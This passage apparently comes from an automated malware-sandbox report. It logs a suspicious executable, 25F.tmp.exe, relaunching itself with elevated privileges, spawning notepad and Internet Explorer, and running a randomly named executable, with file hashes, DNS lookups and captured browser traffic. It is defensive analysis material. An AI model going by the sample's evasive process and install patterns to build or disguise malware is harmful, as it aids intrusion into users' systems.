                                                                Dec 31, 2024 09:04:56.402951002 CET8.8.8.8192.168.2.220xc2aNo error (0)www.msn.comwww-msn-com.a-0003.a-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                Dec 31, 2024 09:04:58.336816072 CET8.8.8.8192.168.2.220x4ab4No error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                Dec 31, 2024 09:05:00.218363047 CET8.8.8.8192.168.2.220x397cNo error (0)c.msn.comc-msn-com-nsatc.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                Dec 31, 2024 09:05:00.239978075 CET8.8.8.8192.168.2.220x7ad0No error (0)sb.scorecardresearch.com18.244.18.38A (IP address)IN (0x0001)false
                                                                Dec 31, 2024 09:05:00.239978075 CET8.8.8.8192.168.2.220x7ad0No error (0)sb.scorecardresearch.com18.244.18.27A (IP address)IN (0x0001)false
                                                                Dec 31, 2024 09:05:00.239978075 CET8.8.8.8192.168.2.220x7ad0No error (0)sb.scorecardresearch.com18.244.18.32A (IP address)IN (0x0001)false
                                                                Dec 31, 2024 09:05:00.239978075 CET8.8.8.8192.168.2.220x7ad0No error (0)sb.scorecardresearch.com18.244.18.122A (IP address)IN (0x0001)false
                                                                Dec 31, 2024 09:05:00.269587040 CET8.8.8.8192.168.2.220x4bfaNo error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                Dec 31, 2024 09:05:00.269587040 CET8.8.8.8192.168.2.220x4bfaNo error (0)code.jquery.com151.101.66.137A (IP address)IN (0x0001)false
                                                                Dec 31, 2024 09:05:00.269587040 CET8.8.8.8192.168.2.220x4bfaNo error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
                                                                Dec 31, 2024 09:05:00.269587040 CET8.8.8.8192.168.2.220x4bfaNo error (0)code.jquery.com151.101.130.137A (IP address)IN (0x0001)false
                                                                Dec 31, 2024 09:05:00.389281988 CET8.8.8.8192.168.2.220x37fbNo error (0)browser.events.data.msn.comglobal.asimov.events.data.trafficmanager.netCNAME (Canonical name)IN (0x0001)false

                                                                HTTP Request Dependency Graph

                                                                • https:
                                                                  • code.jquery.com
                                                                  • sb.scorecardresearch.com

                                                                HTTPS Proxied Packets

                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                0192.168.2.2249181151.101.2.1374433700C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-12-31 08:05:00 UTC314OUTGET /jquery-3.6.3.min.js HTTP/1.1
                                                                Accept: application/javascript, */*;q=0.8
                                                                Referer: https://www.msn.com/?ocid=iehp
                                                                Accept-Language: en-US
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                Accept-Encoding: gzip, deflate
                                                                Host: code.jquery.com
                                                                DNT: 1
                                                                Connection: Keep-Alive
                                                                2024-12-31 08:05:00 UTC612INHTTP/1.1 200 OK
                                                                Connection: close
                                                                Content-Length: 89947
                                                                Server: nginx
                                                                Content-Type: application/javascript; charset=utf-8
                                                                Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                ETag: "28feccc0-15f5b"
                                                                Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                Access-Control-Allow-Origin: *
                                                                Cross-Origin-Resource-Policy: cross-origin
                                                                Via: 1.1 varnish, 1.1 varnish
                                                                Accept-Ranges: bytes
                                                                Age: 1185772
                                                                Date: Tue, 31 Dec 2024 08:05:00 GMT
                                                                X-Served-By: cache-lga21985-LGA, cache-ewr-kewr1740035-EWR
                                                                X-Cache: HIT, HIT
                                                                X-Cache-Hits: 587, 0
                                                                X-Timer: S1735632301.797684,VS0,VE1
                                                                Vary: Accept-Encoding
                                                                2024-12-31 08:05:00 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 33 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                                                                Data Ascii: /*! jQuery v3.6.3 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                                                                2024-12-31 08:05:00 UTC1378INData Raw: 7d 2c 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 65 3f 73 2e 63 61 6c 6c 28 74 68 69 73 29 3a 65 3c 30 3f 74 68 69 73 5b 65 2b 74 68 69 73 2e 6c 65 6e 67 74 68 5d 3a 74 68 69 73 5b 65 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 45 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 65 29 3b 72 65 74 75 72 6e 20 74 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 74 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 45 2e 65 61 63 68 28 74 68 69 73 2c 65 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 6e 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 45 2e 6d 61 70 28 74 68 69 73 2c 66
                                                                Data Ascii: },get:function(e){return null==e?s.call(this):e<0?this[e+this.length]:this[e]},pushStack:function(e){var t=E.merge(this.constructor(),e);return t.prevObject=this,t},each:function(e){return E.each(this,e)},map:function(n){return this.pushStack(E.map(this,f
                                                                2024-12-31 08:05:00 UTC1378INData Raw: 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3b 72 65 74 75 72 6e 21 28 21 65 7c 7c 22 5b 6f 62 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6f 2e 63 61 6c 6c 28 65 29 29 26 26 28 21 28 74 3d 72 28 65 29 29 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 28 6e 3d 79 2e 63 61 6c 6c 28 74 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 74 2e 63 6f 6e 73 74 72 75 63 74 6f 72 29 26 26 61 2e 63 61 6c 6c 28 6e 29 3d 3d 3d 6c 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3b 66 6f 72 28 74 20 69 6e 20 65 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 67 6c 6f 62 61 6c 45 76 61 6c 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 62 28 65 2c 7b 6e 6f 6e 63 65 3a 74 26 26 74 2e 6e 6f
                                                                Data Ascii: on(e){var t,n;return!(!e||"[object Object]"!==o.call(e))&&(!(t=r(e))||"function"==typeof(n=y.call(t,"constructor")&&t.constructor)&&a.call(n)===l)},isEmptyObject:function(e){var t;for(t in e)return!1;return!0},globalEval:function(e,t,n){b(e,{nonce:t&&t.no
                                                                2024-12-31 08:05:00 UTC1378INData Raw: 5d 2c 71 3d 74 2e 70 6f 70 2c 4c 3d 74 2e 70 75 73 68 2c 48 3d 74 2e 70 75 73 68 2c 4f 3d 74 2e 73 6c 69 63 65 2c 50 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 66 6f 72 28 76 61 72 20 6e 3d 30 2c 72 3d 65 2e 6c 65 6e 67 74 68 3b 6e 3c 72 3b 6e 2b 2b 29 69 66 28 65 5b 6e 5d 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6e 3b 72 65 74 75 72 6e 2d 31 7d 2c 52 3d 22 63 68 65 63 6b 65 64 7c 73 65 6c 65 63 74 65 64 7c 61 73 79 6e 63 7c 61 75 74 6f 66 6f 63 75 73 7c 61 75 74 6f 70 6c 61 79 7c 63 6f 6e 74 72 6f 6c 73 7c 64 65 66 65 72 7c 64 69 73 61 62 6c 65 64 7c 68 69 64 64 65 6e 7c 69 73 6d 61 70 7c 6c 6f 6f 70 7c 6d 75 6c 74 69 70 6c 65 7c 6f 70 65 6e 7c 72 65 61 64 6f 6e 6c 79 7c 72 65 71 75 69 72 65 64 7c 73 63 6f 70 65 64 22 2c 4d 3d 22 5b 5c 5c 78 32 30 5c 5c 74
                                                                Data Ascii: ],q=t.pop,L=t.push,H=t.push,O=t.slice,P=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},R="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",M="[\\x20\\t
                                                                2024-12-31 08:05:00 UTC1378INData Raw: 2c 65 65 3d 2f 5b 2b 7e 5d 2f 2c 74 65 3d 6e 65 77 20 52 65 67 45 78 70 28 22 5c 5c 5c 5c 5b 5c 5c 64 61 2d 66 41 2d 46 5d 7b 31 2c 36 7d 22 2b 4d 2b 22 3f 7c 5c 5c 5c 5c 28 5b 5e 5c 5c 72 5c 5c 6e 5c 5c 66 5d 29 22 2c 22 67 22 29 2c 6e 65 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 3d 22 30 78 22 2b 65 2e 73 6c 69 63 65 28 31 29 2d 36 35 35 33 36 3b 72 65 74 75 72 6e 20 74 7c 7c 28 6e 3c 30 3f 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 2b 36 35 35 33 36 29 3a 53 74 72 69 6e 67 2e 66 72 6f 6d 43 68 61 72 43 6f 64 65 28 6e 3e 3e 31 30 7c 35 35 32 39 36 2c 31 30 32 33 26 6e 7c 35 36 33 32 30 29 29 7d 2c 72 65 3d 2f 28 5b 5c 30 2d 5c 78 31 66 5c 78 37 66 5d 7c 5e 2d 3f 5c 64 29 7c 5e 2d 24 7c 5b 5e 5c 30 2d 5c 78 31 66 5c
                                                                Data Ascii: ,ee=/[+~]/,te=new RegExp("\\\\[\\da-fA-F]{1,6}"+M+"?|\\\\([^\\r\\n\\f])","g"),ne=function(e,t){var n="0x"+e.slice(1)-65536;return t||(n<0?String.fromCharCode(n+65536):String.fromCharCode(n>>10|55296,1023&n|56320))},re=/([\0-\x1f\x7f]|^-?\d)|^-$|[^\0-\x1f\
                                                                2024-12-31 08:05:00 UTC1378INData Raw: 29 29 7b 28 66 3d 65 65 2e 74 65 73 74 28 74 29 26 26 76 65 28 65 2e 70 61 72 65 6e 74 4e 6f 64 65 29 7c 7c 65 29 3d 3d 3d 65 26 26 64 2e 73 63 6f 70 65 7c 7c 28 28 73 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 29 3f 73 3d 73 2e 72 65 70 6c 61 63 65 28 72 65 2c 69 65 29 3a 65 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 2c 73 3d 45 29 29 2c 6f 3d 28 6c 3d 68 28 74 29 29 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 6f 2d 2d 29 6c 5b 6f 5d 3d 28 73 3f 22 23 22 2b 73 3a 22 3a 73 63 6f 70 65 22 29 2b 22 20 22 2b 78 65 28 6c 5b 6f 5d 29 3b 63 3d 6c 2e 6a 6f 69 6e 28 22 2c 22 29 7d 74 72 79 7b 69 66 28 64 2e 63 73 73 53 75 70 70 6f 72 74 73 53 65 6c 65 63 74 6f 72 26 26 21 43 53 53 2e 73 75 70 70 6f 72 74 73 28 22 73 65 6c 65 63 74 6f
                                                                Data Ascii: )){(f=ee.test(t)&&ve(e.parentNode)||e)===e&&d.scope||((s=e.getAttribute("id"))?s=s.replace(re,ie):e.setAttribute("id",s=E)),o=(l=h(t)).length;while(o--)l[o]=(s?"#"+s:":scope")+" "+xe(l[o]);c=l.join(",")}try{if(d.cssSupportsSelector&&!CSS.supports("selecto
                                                                2024-12-31 08:05:00 UTC1378INData Raw: 22 69 6e 20 65 26 26 65 2e 64 69 73 61 62 6c 65 64 3d 3d 3d 74 7d 7d 66 75 6e 63 74 69 6f 6e 20 79 65 28 61 29 7b 72 65 74 75 72 6e 20 6c 65 28 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 72 65 74 75 72 6e 20 6f 3d 2b 6f 2c 6c 65 28 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 76 61 72 20 6e 2c 72 3d 61 28 5b 5d 2c 65 2e 6c 65 6e 67 74 68 2c 6f 29 2c 69 3d 72 2e 6c 65 6e 67 74 68 3b 77 68 69 6c 65 28 69 2d 2d 29 65 5b 6e 3d 72 5b 69 5d 5d 26 26 28 65 5b 6e 5d 3d 21 28 74 5b 6e 5d 3d 65 5b 6e 5d 29 29 7d 29 7d 29 7d 66 75 6e 63 74 69 6f 6e 20 76 65 28 65 29 7b 72 65 74 75 72 6e 20 65 26 26 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 26 26 65 7d 66 6f 72 28 65 20 69 6e 20 64 3d 73 65 2e
                                                                Data Ascii: "in e&&e.disabled===t}}function ye(a){return le(function(o){return o=+o,le(function(e,t){var n,r=a([],e.length,o),i=r.length;while(i--)e[n=r[i]]&&(e[n]=!(t[n]=e[n]))})})}function ve(e){return e&&"undefined"!=typeof e.getElementsByTagName&&e}for(e in d=se.
                                                                2024-12-31 08:05:00 UTC1378INData Raw: 3f 28 62 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 3d 3d 3d 74 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 53 29 7b 76 61 72 20 6e 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 72 65 74 75 72 6e 20 6e 3f 5b 6e 5d 3a 5b 5d 7d 7d 29 3a 28 62 2e 66 69 6c 74 65 72 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65
                                                                Data Ascii: ?(b.filter.ID=function(e){var t=e.replace(te,ne);return function(e){return e.getAttribute("id")===t}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&S){var n=t.getElementById(e);return n?[n]:[]}}):(b.filter.ID=function(e){var n=e.replace
                                                                2024-12-31 08:05:00 UTC1378INData Raw: 5b 73 65 6c 65 63 74 65 64 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4d 2b 22 2a 28 3f 3a 76 61 6c 75 65 7c 22 2b 52 2b 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 69 64 7e 3d 22 2b 45 2b 22 2d 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 7e 3d 22 29 2c 28 74 3d 43 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 69 6e 70 75 74 22 29 29 2e 73 65 74 41 74 74 72 69 62 75 74 65 28 22 6e 61 6d 65 22 2c 22 22 29 2c 65 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5b 6e 61 6d 65 3d 27 27 5d 22 29 2e 6c 65 6e 67 74 68 7c 7c 79 2e 70 75 73 68 28 22 5c 5c 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22
                                                                Data Ascii: [selected]").length||y.push("\\["+M+"*(?:value|"+R+")"),e.querySelectorAll("[id~="+E+"-]").length||y.push("~="),(t=C.createElement("input")).setAttribute("name",""),e.appendChild(t),e.querySelectorAll("[name='']").length||y.push("\\["+M+"*name"+M+"*="+M+"
                                                                2024-12-31 08:05:00 UTC1378INData Raw: 6e 74 45 6c 65 6d 65 6e 74 7c 7c 65 2c 72 3d 74 26 26 74 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 72 65 74 75 72 6e 20 65 3d 3d 3d 72 7c 7c 21 28 21 72 7c 7c 31 21 3d 3d 72 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 28 6e 2e 63 6f 6e 74 61 69 6e 73 3f 6e 2e 63 6f 6e 74 61 69 6e 73 28 72 29 3a 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 26 26 31 36 26 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 72 29 29 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 74 29 77 68 69 6c 65 28 74 3d 74 2e 70 61 72 65 6e 74 4e 6f 64 65 29 69 66 28 74 3d 3d 3d 65 29 72 65 74 75 72 6e 21 30 3b 72 65 74 75 72 6e 21 31 7d 2c 6a 3d 74 3f 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 65 3d 3d 3d 74 29 72 65 74 75
                                                                Data Ascii: ntElement||e,r=t&&t.parentNode;return e===r||!(!r||1!==r.nodeType||!(n.contains?n.contains(r):e.compareDocumentPosition&&16&e.compareDocumentPosition(r)))}:function(e,t){if(t)while(t=t.parentNode)if(t===e)return!0;return!1},j=t?function(e,t){if(e===t)retu


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                1192.168.2.224917518.244.18.384433700C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-12-31 08:05:00 UTC515OUTGET /b?rn=1735632299605&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0B7EB9A71D6D654F0B8CACC11CC56471&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                                Referer: https://www.msn.com/?ocid=iehp
                                                                Accept-Language: en-US
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                Accept-Encoding: gzip, deflate
                                                                Host: sb.scorecardresearch.com
                                                                DNT: 1
                                                                Connection: Keep-Alive
                                                                2024-12-31 08:05:01 UTC657INHTTP/1.1 302 Found
                                                                Content-Length: 0
                                                                Connection: close
                                                                Date: Tue, 31 Dec 2024 08:05:01 GMT
                                                                Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                Location: /b2?rn=1735632299605&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0B7EB9A71D6D654F0B8CACC11CC56471&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null
                                                                set-cookie: UID=14E06ac0e6e71ba2b029fc21735632301; domain=.scorecardresearch.com; path=/; max-age=33696000
                                                                X-Cache: Miss from cloudfront
                                                                Via: 1.1 e4f83d72be7853fbcceb590827a5b68a.cloudfront.net (CloudFront)
                                                                X-Amz-Cf-Pop: FRA56-P11
                                                                X-Amz-Cf-Id: r1MqcoqDGf7o-bo6DaEPtAWJcjVjodwdnLLNiZoW1MW1-stF0UKLEw==


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                2192.168.2.224917418.244.18.384433700C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-12-31 08:05:01 UTC516OUTGET /b2?rn=1735632299605&c1=2&c2=3000001&cs_ucfr=1&c7=https%3A%2F%2Fwww.msn.com%2F%3Focid%3Diehp%26mkt%3Den-us&c8=MSN&c9=&cs_fpid=0B7EB9A71D6D654F0B8CACC11CC56471&cs_fpit=o&cs_fpdm=*null&cs_fpdt=*null HTTP/1.1
                                                                Accept: image/png, image/svg+xml, image/*;q=0.8, */*;q=0.5
                                                                Referer: https://www.msn.com/?ocid=iehp
                                                                Accept-Language: en-US
                                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                Accept-Encoding: gzip, deflate
                                                                Host: sb.scorecardresearch.com
                                                                DNT: 1
                                                                Connection: Keep-Alive
                                                                2024-12-31 08:05:01 UTC327INHTTP/1.1 204 No Content
                                                                Connection: close
                                                                Date: Tue, 31 Dec 2024 08:05:01 GMT
                                                                Accept-CH: UA, Platform, Arch, Model, Mobile
                                                                X-Cache: Miss from cloudfront
                                                                Via: 1.1 abf6c055b398b223d7325958955066c0.cloudfront.net (CloudFront)
                                                                X-Amz-Cf-Pop: FRA56-P11
                                                                X-Amz-Cf-Id: hRT2YiJJ7khZBqyu1pxPMRUgxZqddWBxpUKrxiD8dsarhUveBPLbCw==


                                                                Statistics

                                                                CPU Usage

                                                                Click to jump to process

                                                                Memory Usage

                                                                Click to jump to process

                                                                High Level Behavior Distribution

                                                                Click to dive into process behavior distribution

                                                                Behavior

                                                                Click to jump to process

                                                                System Behavior

                                                                General

                                                                Target ID:0
                                                                Start time:03:04:33
                                                                Start date:31/12/2024
                                                                Path:C:\Users\user\Desktop\25F.tmp.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Users\user\Desktop\25F.tmp.exe"
                                                                Imagebase:0x600000
                                                                File size:180'224 bytes
                                                                MD5 hash:348AD3E983CCCBAB62C3648F0BCB0F88
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:Borland Delphi
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:2
                                                                Start time:03:04:43
                                                                Start date:31/12/2024
                                                                Path:C:\Users\user\Desktop\25F.tmp.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\Desktop\25F.tmp.exe
                                                                Imagebase:0x600000
                                                                File size:180'224 bytes
                                                                MD5 hash:348AD3E983CCCBAB62C3648F0BCB0F88
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:3
                                                                Start time:03:04:44
                                                                Start date:31/12/2024
                                                                Path:C:\Windows\notepad.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\notepad.exe"
                                                                Imagebase:0xff820000
                                                                File size:193'536 bytes
                                                                MD5 hash:B32189BDFF6E577A92BAA61AD49264E6
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:moderate
                                                                Has exited:false

                                                                General

                                                                Target ID:4
                                                                Start time:03:04:44
                                                                Start date:31/12/2024
                                                                Path:C:\Users\user\Desktop\25F.tmp.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Users\user\Desktop\25F.tmp.exe
                                                                Imagebase:0x600000
                                                                File size:180'224 bytes
                                                                MD5 hash:348AD3E983CCCBAB62C3648F0BCB0F88
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:5
                                                                Start time:03:04:47
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\Internet Explorer\iexplore.exe"
                                                                Imagebase:0x880000
                                                                File size:815'304 bytes
                                                                MD5 hash:8A590F790A98F3D77399BE457E01386A
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:true

                                                                General

                                                                Target ID:6
                                                                Start time:03:04:47
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files\Internet Explorer\iexplore.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Program Files\Internet Explorer\IEXPLORE.EXE"
                                                                Imagebase:0x13f530000
                                                                File size:814'288 bytes
                                                                MD5 hash:4EB098135821348270F27157F7A84E65
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:8
                                                                Start time:03:04:50
                                                                Start date:31/12/2024
                                                                Path:C:\Windows\SysWOW64\wbem\WmiPrvSE.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding
                                                                Imagebase:0xa70000
                                                                File size:355'328 bytes
                                                                MD5 hash:54B7C43C2E89F5CE71B2C255C1CF35E2
                                                                Has elevated privileges:true
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Reputation:low
                                                                Has exited:true

                                                                General

                                                                Target ID:9
                                                                Start time:03:04:50
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:10
                                                                Start time:03:04:50
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:11
                                                                Start time:03:04:50
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:12
                                                                Start time:03:04:50
                                                                Start date:31/12/2024
                                                                Path:C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe
                                                                Wow64 process (32bit):true
                                                                Commandline:"C:\Program Files (x86)\lCyiQRNfhEzGlaSPpHBrxoqlJRwrIjunLvVcUmoVIwpyPGeLpZxDbxi\QgGhoOpxHPl.exe"
                                                                Imagebase:0x1230000
                                                                File size:140'800 bytes
                                                                MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                Has elevated privileges:true
                                                                Has administrator privileges:true
                                                                Programmed in:C, C++ or other language
                                                                Reputation:high
                                                                Has exited:false

                                                                General

                                                                Target ID:13
                                                                Start time:03:04:51
                                                                Start date:31/12/2024
